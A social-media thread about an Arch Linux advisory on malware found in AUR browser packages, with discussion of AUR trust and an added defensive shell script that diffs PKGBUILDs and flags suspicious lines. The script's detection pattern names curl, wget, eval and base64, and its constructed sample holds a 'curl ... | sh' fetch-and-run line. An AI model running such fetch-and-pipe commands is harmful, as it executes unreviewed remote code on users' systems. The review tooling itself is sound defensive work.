[aur-general] - [SECURITY] firefox-patch-bin, librewolf-fix-bin and zen-browser-patched-bin AUR packages contained malware

https://lists.archlinux.org/archives/list/aur-general@lists.archlinux.org/thread/7EZTJXLIAQLARQNTMEW2HBWZYE626IFJ/

#security #linux #ArchLinux


@archlinux nice, isn't it cool how every arch user I've ever met thinks it's totally fine to run arbitrary binaries from strangers, with absolutely no concept of what project packaging is and what official maintainers do

@froge @archlinux

> DISCLAIMER: AUR packages are user produced content. Any use of the provided files is at your own risk.

Reckless people will do reckless things; users are advised to audit PKGBUILDs and all changes to them.
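One way to act on that advice before an AUR helper builds an update, as an added example that is not part of this thread or of any Arch tooling: keep the PKGBUILD you last reviewed, diff it against the current one, and flag newly added lines that fetch from the network at build time, pipe into a shell, use obfuscation helpers, add `SKIP` checksums or touch the `source` array. The two PKGBUILD snapshots, the `example.invalid` URLs and the pattern list are all constructed for the demo; the patterns are a review heuristic, not a malware signature.

```shell
#!/bin/sh
# Added example (not from the thread): show what changed in a PKGBUILD since
# the version you last audited and flag additions that deserve a close look
# before building. Both snapshots are constructed for this demo; they are
# not the packages named in the advisory.

# Heuristic patterns for newly added lines: build-time network fetches,
# piping into a shell, obfuscation helpers, unverified checksums, and any
# change to the source array. Assumed list; extend it for your own review.
SUSPICIOUS_RE='curl|wget|[|] *(sh|bash)|eval|base64|SKIP|source='

# Write two constructed snapshots into a temp dir and print its path.
make_samples() {
    dir=$(mktemp -d)
    cat > "$dir/PKGBUILD.reviewed" <<'EOF'
pkgname=example-bin
pkgver=1.0
pkgrel=1
source=("https://example.invalid/example-1.0.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
package() {
  install -Dm755 example "$pkgdir/usr/bin/example"
}
EOF
    cat > "$dir/PKGBUILD.current" <<'EOF'
pkgname=example-bin
pkgver=1.0
pkgrel=2
source=("https://example.invalid/example-1.0.tar.gz" "https://example.invalid/setup.sh")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000' 'SKIP')
package() {
  install -Dm755 example "$pkgdir/usr/bin/example"
  curl -s https://example.invalid/extra | sh
}
EOF
    printf '%s\n' "$dir"
}

# Print only the lines that are new in $2 relative to $1.
added_lines() {
    # diff exits 1 when the files differ; that is the interesting case,
    # so the pipeline's status is discarded.
    diff "$1" "$2" | grep '^>' | sed 's/^> //' || true
}

# Print how many added lines match the heuristic patterns (0 when none).
count_flagged_additions() {
    added_lines "$1" "$2" | grep -E -c "$SUSPICIOUS_RE" || true
}

# Show every added line, mark the flagged ones, and return 1 if any were
# flagged so an automated build can stop and wait for a human.
audit_pkgbuild_diff() {
    flagged=$(count_flagged_additions "$1" "$2")
    added_lines "$1" "$2" | while IFS= read -r line; do
        if printf '%s\n' "$line" | grep -E -q "$SUSPICIOUS_RE"; then
            printf 'REVIEW  %s\n' "$line"
        else
            printf '        %s\n' "$line"
        fi
    done
    [ "$flagged" -eq 0 ]
}

# Demo run on the constructed snapshots.
samples=$(make_samples)
if audit_pkgbuild_diff "$samples/PKGBUILD.reviewed" "$samples/PKGBUILD.current"; then
    echo "no suspicious additions"
else
    echo "suspicious additions found; read the full PKGBUILD before building"
fi
rm -rf "$samples"
```

On the constructed snapshots the audit marks three added lines for review: the changed `source=` array, the `'SKIP'` checksum, and the `curl ... | sh` in `package()`; the bumped `pkgrel` passes through unmarked. A zero-flag result only means nothing matched the heuristic, so the full PKGBUILD and any new `source` entries still need to be read.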

@gromit @archlinux yeah, but everyone totally ignores or plays down the warnings, there is a culture of blindly trusting the AUR among arch users usually

I'm a long time contributor to a large Linux community online, and often one of the first things users do on a clean install is set up an AUR helper and blindly pull packages they want

@froge @archlinux Well yes, but from our side users are advised not to use an AUR helper until they know what they're doing ..

But if people continue to ignore advice and good practices and also keep installing stuff with "curl <url> | sh" you maybe just can't help them :D

@gromit @froge @archlinux Love how literally half the time I see an official arch post/talk it contains "Don't trust the AUR and don't/only very carefully use helpers", I'm always agreeing and reinforcing that, yet I run a script to automatically compile over 100 AUR packages inside a docker container where the build user has root access without a password lol

@gromit @froge @archlinux is there an explanation for dumb people like me, why it is more unlikely that something like that will happen in the official packages or even in the debian repository. like a package maintainer goes rogue?
@utf_7 @gromit @archlinux the official repos are managed by trusted maintainers and have a review and quality assurance process which is likely to catch any malicious or incorrect changes

the AUR is simply a list of packages maintained by random people who have free rein to update them whenever they want, with anything they want, without review or checks

using the AUR is a bit like going and installing a random binary from a random github project, without anyone checking the code at all; the official repos have a lot of peer review by people with good reputations in the arch community

@utf_7 Is it possible? Sure. But then the maintainer's credentials are compromised or the maintainer is malicious. For both of them you can remove the maintainer from the project, and they generally aren't considered trustworthy anymore if done maliciously.

Since distro packages are signed, the provided build/binary and its build script are "vouched for" (to some degree) by the maintainer that signed the package.